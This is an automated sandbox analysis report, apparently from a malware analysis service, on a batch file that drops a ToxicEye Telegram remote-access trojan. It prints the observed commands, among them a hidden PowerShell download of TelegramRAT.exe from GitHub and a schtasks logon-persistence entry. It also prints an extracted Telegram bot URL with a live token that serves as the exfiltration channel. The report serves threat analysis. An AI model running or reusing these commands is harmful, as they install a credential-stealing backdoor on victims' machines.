Analysis
-
max time kernel
103s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
08/04/2025, 22:04
Static task
static1
General
-
Target
6VW06_start.bat
-
Size
359B
-
MD5
567faa0407f102c40f1796b392530852
-
SHA1
0adbdf7d448caae6e96e067d1551b7462d26c4fd
-
SHA256
ea346b60666802c1985522daf4187f41aef151475086125fdad8c0930e0f78d3
-
SHA512
0b3ef1798ef70ae67c9a65e1fce3dbb237224b6da6871c0777f3fc4438fbc5725be421c97220674d7a202a99736a206f4658119d8bcc7516699d022648082022
Malware Config
Extracted
https://github.com/Igor65afk/cxvd-vvcxxcvcxv/raw/refs/heads/main/TelegramRAT.exe
Extracted
toxiceye
https://api.telegram.org/bot7582691185:AAHyDd26FPsOpJGflKOytG7VEH8s8wridm0/sendMessage?chat_id=8029727797
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/files/0x00090000000241ed-17.dat disable_win_def behavioral1/memory/4624-21-0x0000015970A10000-0x0000015970A3A000-memory.dmp disable_win_def -
Toxiceye family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 1196 powershell.exe 9 1196 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1196 powershell.exe -
Downloads MZ/PE file 3 IoCs
flow pid Process 9 1196 powershell.exe 42 4384 total.exe 41 4384 total.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation cscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation TelegramRAT.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation total.exe -
Executes dropped EXE 2 IoCs
pid Process 4624 TelegramRAT.exe 4384 total.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 42 raw.githubusercontent.com 8 raw.githubusercontent.com 9 raw.githubusercontent.com 41 raw.githubusercontent.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4312 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 3732 timeout.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ cscript.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3152 schtasks.exe 2376 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1196 powershell.exe 1196 powershell.exe 4384 total.exe 4384 total.exe 4384 total.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1196 powershell.exe Token: SeDebugPrivilege 4624 TelegramRAT.exe Token: SeDebugPrivilege 4312 tasklist.exe Token: SeDebugPrivilege 4384 total.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4384 total.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 4324 wrote to memory of 1196 4324 cmd.exe 87 PID 4324 wrote to memory of 1196 4324 cmd.exe 87 PID 4324 wrote to memory of 4456 4324 cmd.exe 91 PID 4324 wrote to memory of 4456 4324 cmd.exe 91 PID 4324 wrote to memory of 4472 4324 cmd.exe 92 PID 4324 wrote to memory of 4472 4324 cmd.exe 92 PID 4472 wrote to memory of 4624 4472 cscript.exe 93 PID 4472 wrote to memory of 4624 4472 cscript.exe 93 PID 4624 wrote to memory of 3152 4624 TelegramRAT.exe 99 PID 4624 wrote to memory of 3152 4624 TelegramRAT.exe 99 PID 4624 wrote to memory of 3492 4624 TelegramRAT.exe 102 PID 4624 wrote to memory of 3492 4624 TelegramRAT.exe 102 PID 3492 wrote to memory of 4312 3492 cmd.exe 104 PID 3492 wrote to memory of 4312 3492 cmd.exe 104 PID 3492 wrote to memory of 1752 3492 cmd.exe 105 PID 3492 wrote to memory of 1752 3492 cmd.exe 105 PID 3492 wrote to memory of 3732 3492 cmd.exe 108 PID 3492 wrote to memory of 3732 3492 cmd.exe 108 PID 3492 wrote to memory of 4384 3492 cmd.exe 109 PID 3492 wrote to memory of 4384 3492 cmd.exe 109 PID 4384 wrote to memory of 2376 4384 total.exe 113 PID 4384 wrote to memory of 2376 4384 total.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4456 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\6VW06_start.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c "(New-Object Net.WebClient).DownloadFile('https://github.com/Igor65afk/cxvd-vvcxxcvcxv/raw/refs/heads/main/TelegramRAT.exe','TelegramRAT.exe')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Windows\system32\attrib.exeattrib +h TelegramRAT.exe2⤵
- Views/modifies file attributes
PID:4456
-
-
C:\Windows\system32\cscript.execscript //nologo x.vbs2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "discord" /tr "C:\Users\virustotal\total.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3152
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp51D9.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp51D9.tmp.bat4⤵
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4624"5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
C:\Windows\system32\find.exefind ":"5⤵PID:1752
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak5⤵
- Delays execution with timeout.exe
PID:3732
-
-
C:\Users\virustotal\total.exe"total.exe"5⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "discord" /tr "C:\Users\virustotal\total.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:2376
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
146KB
MD56ff6e8812137e3649ed79fc86ce62378
SHA1d7ed66fcc0005ed57395f8e5c2c8d0e3ea7eb789
SHA2569e0dcbe4464af315c5956b153de276e1436eef533d77ddfea8d7daaf821b0861
SHA5121616ccdd81aba448bf79a6216be7333041e5143868deb42763588dd992487327cfd99b5073487110bc7bea42b900920b916b3393c6dc77be3136bbe0cdc389cc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
192B
MD598f8f68722da3bee3e075b7d7bf7969a
SHA1c5110df8ed2c667de8b5ddfffa3ed99a84b4f961
SHA25678408ab0ad201c990d2b6689f8131edee10c66b1a5bcf0034f2aed1b3c226cc5
SHA51233c3698698f764784619521e846db03fa1d60afb9a9b2856125af338447353f713f26e907632025502de5e847c16d5dab18cfeb0cd1b4affe15e9618a9a8880b
-
Filesize
106B
MD574763585906a9a0610c8f7154d311a62
SHA19acfb60dcb8e934c56d0587f8f7d9ec59f09a35a
SHA256ed5b2a7b68fe9b4eac47e50090b2f4d06444f3e89524fb337b71ec36be6967c5
SHA512f7c8a08ecd1f69d1dac8be2335915fa3a9c32bcaa22631cdd7b760bef21cb5438e0da8741e64cd86dde1caf9411aa705fcbc1b2122aaa9dbcc0be5a2821d5313